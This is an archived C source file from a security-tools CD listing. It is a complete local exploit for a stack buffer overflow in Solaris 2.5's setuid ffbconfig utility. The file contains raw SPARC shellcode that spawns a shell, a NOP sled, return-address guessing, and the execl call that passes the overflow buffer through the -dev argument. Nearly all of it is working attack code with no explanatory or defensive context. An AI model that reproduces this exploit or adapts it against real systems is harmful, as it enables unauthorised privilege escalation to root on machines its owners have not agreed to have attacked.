home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / ffb.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  1KB  |  57 lines

  1. /*
  2. This works on Solaris 2.5 wiz /usr/sbin/ffbconfig
  3. */
  4.  
  5. #include <stdio.h>
  6. #include <stdlib.h>
  7. #include <sys/types.h>
  8. #include <unistd.h>
  9.  
  10. #define BUF_LENGTH      128
  11. #define EXTRA           256
  12. #define STACK_OFFSET    128
  13. #define SPARC_NOP       0xa61cc013
  14.  
  15. u_char sparc_shellcode[] =
  16.   "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
  17.   "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
  18.   "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
  19.   "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
  20.   "\x82\x10\x20\x3b\x91\xd4\xff\xff";
  21.  
  22. u_long get_sp(void)
  23. {
  24.   __asm__("mov %sp,%i0 \n");
  25. }
  26.  
  27. void main(int argc, char *argv[])
  28. {
  29.   char buf[BUF_LENGTH + EXTRA];
  30.   long targ_addr;
  31.   u_long *long_p;
  32.   u_char *char_p;
  33.   int i, code_length = strlen(sparc_shellcode),so;
  34.  
  35.   long_p = (u_long *) buf;
  36.  
  37.   for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
  38.     *long_p++ = SPARC_NOP;
  39.  
  40.   char_p = (u_char *) long_p;
  41.  
  42.   for (i = 0; i < code_length; i++)
  43.     *char_p++ = sparc_shellcode[i];
  44.  
  45.   long_p = (u_long *) char_p;
  46.  
  47.   targ_addr = get_sp() - STACK_OFFSET;
  48.   for (i = 0; i < EXTRA / sizeof(u_long); i++)
  49.     *long_p++ =targ_addr;
  50.  
  51.   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
  52.          targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  53.  
  54.   execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf,(char *) 0);
  55.   perror("execl failed");
  56. }
  57. /*                    www.hack.co.za              [2000]*/